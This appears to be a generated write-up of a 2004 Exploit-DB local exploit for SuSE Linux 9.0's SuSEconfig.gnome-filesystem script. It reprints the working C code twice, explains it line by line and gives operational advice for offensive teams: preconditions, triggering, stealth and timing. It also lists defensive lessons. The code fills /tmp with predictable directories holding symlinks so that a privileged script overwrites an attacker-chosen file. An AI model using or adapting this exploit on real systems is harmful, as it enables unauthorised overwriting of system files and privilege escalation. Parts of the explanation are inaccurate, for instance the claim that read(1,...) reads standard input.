Exploiting SuSE Linux 9.0 YaST Configuration Script Vulnerability

What this paper is

This paper details a local privilege escalation vulnerability in SuSE Linux 9.0. Specifically, it targets the SuSEconfig.gnome-filesystem script, which is part of the YaST (Yet Another Setup Tool) configuration system. The vulnerability allows an attacker to overwrite arbitrary files on the system by manipulating temporary directory creation and symbolic links.

Simple technical breakdown

The exploit works by creating a large number of temporary directories with specific naming patterns. Inside each of these directories, it creates a symbolic link. The key to the exploit is that the SuSEconfig.gnome-filesystem script, when it runs, will attempt to process these directories. Due to a race condition or improper handling of symbolic links within the script, it can be tricked into following a symbolic link to a file that the attacker wants to overwrite.

The exploit code itself generates these temporary directories and symbolic links. When the vulnerable script is later executed (either manually or by the system), it will interact with these created links, leading to the overwrite of the target file specified by the attacker.

Complete code and payload walkthrough

Let's break down the provided C code:

#include <stdio.h>
#include <unistd.h>
#include <string.h>

#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000

 int main(int argc, char **argv)
 {
 int i;
 char buf[150];

 printf("\tSuSE 9.0 YaST script
SuSEconfig.gnome-filesystem exploit\n");
 printf("\t-------------------------------------------------------------
\n");
 printf("\tdiscovered and written by l0om
<l0om excluded org>\n");
 printf("\t WWW.EXCLUDED.ORG\n\n");

 if(argc != 2) {
 printf("usage: %s <destination-file>\n",argv[0]);
 exit(0xff);
 }

 printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);
 read(1, buf, 1); fflush(stdin);

 umask(0000);
 printf("working\n\n");
 for(i = START; i < END; i++) {
 snprintf(buf, sizeof(buf),"%s%d",PATH,i);
 if(mkdir(buf,00777) == -1) {
 fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);
 exit(0xff);
 }
 if(!(i%1000))printf(".");
 strcat(buf, "/found");
 if(symlink(argv[1], buf) == -1) {
 fprintf(stderr, "cannot creat symlink from %s to %s
[Nr.%d]\n",buf,argv[1],i);
 exit(0xff);
 }
 }
 printf("\ndone!\n");
 printf("next time the SuSE.gnome-filesystem script
gets executed\n");
 printf("we will create or overwrite file %s
\n",argv[1]);
 return(0x00);
 } /* i cant wait for the new gobbles comic!! */

Code Fragment/Block -> Practical Purpose

• #include <stdio.h>, #include <unistd.h>, #include <string.h>: Standard C library includes for input/output, system calls, and string manipulation. These are fundamental for any C program interacting with the operating system.
• #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem.": Defines a prefix for the temporary directories that will be created. This prefix is chosen to match the expected naming convention of temporary files generated by the SuSEconfig.gnome-filesystem script.
• #define START 1, #define END 33000: Define the range of numbers to be appended to the PATH for creating directories. The exploit aims to create 33,000 directories.
• int main(int argc, char **argv): The main function of the program. argc is the argument count, and argv is an array of strings representing the arguments passed to the program.
• int i; char buf[150];: Declares an integer i for loop iteration and a character buffer buf of size 150 bytes to store strings, primarily for constructing file paths.
• printf(...): These lines print informational messages to the console, including the exploit's name, author, and website.
• if(argc != 2): Checks if the program was executed with exactly one command-line argument. If not, it prints a usage message and exits with an error code (0xff, which is 255 in decimal).
  • Purpose: Ensures the user provides the target file to be overwritten.
• printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);: Prompts the user to press Enter to confirm the action, displaying the target file name (argv[1]). fflush(stdout) ensures the prompt is displayed immediately.
• read(1, buf, 1); fflush(stdin);: Reads a single character from standard input (file descriptor 1) into buf. This is used to pause execution until the user presses Enter. fflush(stdin) attempts to clear the input buffer, though its behavior can be platform-dependent.
  • Purpose: User confirmation before proceeding with potentially destructive actions.
• umask(0000);: Sets the file mode creation mask to all zeros. This means that newly created files and directories will have the maximum possible permissions (0777 for directories, 0666 for files), allowing any user to read, write, and execute them.
  • Purpose: Ensures that the created directories and symlinks have the broadest possible permissions, facilitating the exploit.
• printf("working\n\n");: Informs the user that the exploit is starting its main operation.
• for(i = START; i < END; i++): This is the core loop of the exploit. It iterates from START (1) up to, but not including, END (33000).
• snprintf(buf, sizeof(buf),"%s%d",PATH,i);: Constructs the path for a temporary directory. It takes the PATH prefix and appends the current loop counter i. snprintf is used for safe string formatting, preventing buffer overflows.
  • Purpose: Creates unique directory names like /tmp/tmp.SuSEconfig.gnome-filesystem.1, /tmp/tmp.SuSEconfig.gnome-filesystem.2, etc.
• if(mkdir(buf,00777) == -1): Attempts to create the directory specified by buf with permissions 00777 (read, write, execute for owner, group, and others). If mkdir fails (returns -1), an error message is printed, and the program exits.
  • Purpose: Creates the temporary directories. The 00777 permissions are crucial for the exploit's success.
• if(!(i%1000))printf(".");: This line prints a dot (.) every 1000 iterations. This provides visual feedback to the user that the exploit is still running and making progress.
  • Purpose: Progress indicator.
• strcat(buf, "/found");: Appends /found to the buf string. Now buf holds a path like /tmp/tmp.SuSEconfig.gnome-filesystem.1/found.
  • Purpose: Prepares the path for the symbolic link.
• if(symlink(argv[1], buf) == -1): Attempts to create a symbolic link. argv[1] is the target of the symbolic link (the file the attacker wants to overwrite), and buf is the name of the symbolic link being created (e.g., /tmp/tmp.SuSEconfig.gnome-filesystem.1/found). If symlink fails, an error message is printed, and the program exits.
  • Purpose: Creates the symbolic link. This is the core of the exploit mechanism. The script SuSEconfig.gnome-filesystem will eventually interact with these links.
• printf("\ndone!\n");: Informs the user that the directory and symlink creation process is complete.
• printf("next time the SuSE.gnome-filesystem script gets executed\n"); printf("we will create or overwrite file %s\n",argv[1]);: Explains the consequence of the exploit: when the vulnerable script runs, it will now be able to create or overwrite the specified argv[1] file.
• return(0x00);: Exits the program successfully.
• /* i cant wait for the new gobbles comic!! */: A comment from the author, not relevant to the exploit logic.

Payload/Shellcode Segment Explanation:

There is no explicit shellcode or payload bytes in this C code. The "payload" in this context is the effect of the exploit: the creation of the temporary directories and symbolic links. The actual code that performs the file overwrite is the vulnerable SuSEconfig.gnome-filesystem script itself, which is not provided here but is implied to be present on the target system. The C program acts as a "preparer" for the exploit, setting up the conditions for the vulnerable script to be triggered.

Practical details for offensive operations teams

• Required Access Level: Local user access. This is a local privilege escalation exploit, meaning the attacker must already have an account on the target system.
• Lab Preconditions:
  • A SuSE Linux 9.0 system (or a system with a vulnerable version of the SuSEconfig.gnome-filesystem script).
  • The SuSEconfig.gnome-filesystem script must be present and executable.
  • The user must have write permissions in /tmp.
  • The target file (argv[1]) must exist or be creatable by the user, and the attacker must know its path.
• Tooling Assumptions:
  • A C compiler (like GCC) to compile the exploit code on the target system or cross-compile it.
  • Standard Linux command-line utilities (printf, read, snprintf, mkdir, symlink, umask, exit).
• Execution Pitfalls:
  • Race Condition: The exploit relies on the vulnerable script being executed after the attacker has set up the symbolic links. If the vulnerable script is run before the exploit completes, or if the script is not run at all, the exploit will not succeed.
  • Temporary File Cleanup: If the system or other processes clean up temporary files in /tmp aggressively, the attacker's created directories and symlinks might be removed before the vulnerable script is executed.
  • Script Execution Trigger: The attacker needs a way to ensure the SuSEconfig.gnome-filesystem script is executed. This might involve waiting for a system event, triggering a service restart, or manually running the script if they have sufficient privileges to do so.
  • Target File Permissions: The attacker needs to ensure the target file (argv[1]) is one that the SuSEconfig.gnome-filesystem script has permission to overwrite. If the script runs as a low-privileged user, it can only overwrite files that user can modify. If the script runs as root, the attacker can overwrite critical system files.
  • Path Length Limits: While buf is 150 bytes, the total path length created by PATH + i + /found could potentially exceed filesystem limits on very old systems, though unlikely with these values.
  • Resource Limits: Creating 33,000 directories might hit filesystem limits on the number of entries in a directory or inode limits, though /tmp is usually a good candidate for this.
• Tradecraft Considerations:
  • Stealth: Running this exploit might generate significant disk I/O and create many files in /tmp, which could be detected by system monitoring.
  • Timing: The attacker needs to time the execution of the exploit preparation with the execution of the vulnerable script.
  • Payload Delivery: The C code is the "delivery mechanism" for the exploit's setup. The actual "payload" (e.g., a reverse shell, a command execution) would be what the attacker aims to achieve by overwriting a critical configuration file or executable.
• Expected Telemetry:
  • Creation of numerous directories in /tmp matching the PATH pattern.
  • Creation of numerous symbolic links within these directories.
  • Increased disk I/O activity.
  • Execution of the SuSEconfig.gnome-filesystem script.
  • Modification or creation of the target file specified by argv[1].
  • Potential error messages if mkdir or symlink fail.

Where this was used and when

• Context: This exploit targets a specific configuration script within the YaST framework on SuSE Linux 9.0. YaST is a comprehensive system configuration tool. The vulnerability likely arises from how this script handles temporary files and symbolic links during its operation, possibly during system updates, package installations, or configuration changes related to GNOME filesystem integration.
• Approximate Year/Date: The exploit was published on January 15, 2004. Therefore, its practical use would have been around this time, targeting SuSE Linux 9.0 systems which were current or recently current around 2004.

Defensive lessons for modern teams

• Secure Temporary File Handling: Always use secure methods for creating and managing temporary files and directories. Avoid predictable naming patterns. Use functions like mkstemp or mkdtemp which create temporary files/directories with unique, secure names and set appropriate permissions.
• Symbolic Link Security: Be extremely cautious when processing symbolic links, especially in scripts that run with elevated privileges. Validate the target of a symbolic link to ensure it points to an expected and safe location. Avoid following symbolic links into untrusted directories.
• Race Condition Mitigation: Design systems to avoid race conditions. If temporary resources are needed, ensure they are created and used atomically or with proper locking mechanisms.
• Principle of Least Privilege: Scripts and applications should run with the minimum privileges necessary to perform their function. If SuSEconfig.gnome-filesystem didn't need root privileges to overwrite arbitrary files, this vulnerability would be less severe.
• Regular Patching and Updates: Keep operating systems and all installed software up-to-date with security patches. This vulnerability was specific to an older version of SuSE Linux.
• Input Validation: Validate all inputs, especially those that control file operations or paths.
• Auditing and Monitoring: Implement robust auditing and monitoring to detect suspicious file creation, modification, and script execution patterns, particularly in sensitive directories like /tmp.

ASCII visual (if applicable)

This exploit involves a sequence of actions rather than a complex architecture. A simple flow diagram can illustrate the process:

+-----------------+     +-------------------+     +-----------------------+
| Attacker's      | --> | Exploit C Program | --> | Target File (argv[1]) |
| Local User      |     | (Runs on Target)  |     +-----------------------+
+-----------------+     +-------------------+
                              |
                              | Creates many temporary directories
                              | and symbolic links in /tmp
                              | (e.g., /tmp/tmp.SuSEconfig.gnome-filesystem.N/found -> argv[1])
                              v
                        +-------------------------+
                        | SuSEconfig.gnome-        |
                        | filesystem Script       |
                        | (Vulnerable)            |
                        +-------------------------+
                              |
                              | Processes temp dirs/symlinks
                              | (Race condition/improper handling)
                              v
                        +-------------------------+
                        | Overwrites Target File  |
                        | (argv[1])               |
                        +-------------------------+

Source references

• Paper ID: 144
• Paper Title: SuSE Linux 9.0 - YaST Configuration Skribt Overwrite Files
• Author: l0om
• Published: 2004-01-15
• Keywords: Linux, local
• Paper URL: https://www.exploit-db.com/papers/144
• Raw URL: https://www.exploit-db.com/raw/144

Original Exploit-DB Content (Verbatim)

#include <stdio.h>  
#include <unistd.h>  
#include <string.h>  
  
#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."  
#define START 1  
#define END 33000  
  
 int main(int argc, char **argv)  
 {  
 int i;  
 char buf[150];  
  
 printf("\tSuSE 9.0 YaST script 
SuSEconfig.gnome-filesystem exploit\n");  
 printf("\t-------------------------------------------------------------
\n");  
 printf("\tdiscovered and written by l0om 
<l0om excluded org>\n");  
 printf("\t WWW.EXCLUDED.ORG\n\n");  
  
 if(argc != 2) {  
 printf("usage: %s <destination-file>\n",argv[0]);  
 exit(0xff);  
 }  
  
 printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);  
 read(1, buf, 1); fflush(stdin);  
  
 umask(0000);  
 printf("working\n\n");  
 for(i = START; i < END; i++) {  
 snprintf(buf, sizeof(buf),"%s%d",PATH,i);  
 if(mkdir(buf,00777) == -1) {  
 fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);  
 exit(0xff);  
 }  
 if(!(i%1000))printf(".");  
 strcat(buf, "/found");  
 if(symlink(argv[1], buf) == -1) {  
 fprintf(stderr, "cannot creat symlink from %s to %s 
[Nr.%d]\n",buf,argv[1],i);  
 exit(0xff);  
 }  
 }  
 printf("\ndone!\n");  
 printf("next time the SuSE.gnome-filesystem script 
gets executed\n");  
 printf("we will create or overwrite file %s
\n",argv[1]);  
 return(0x00);  
 }  /* i cant wait for the new gobbles comic!! */ 

// milw0rm.com [2004-01-15]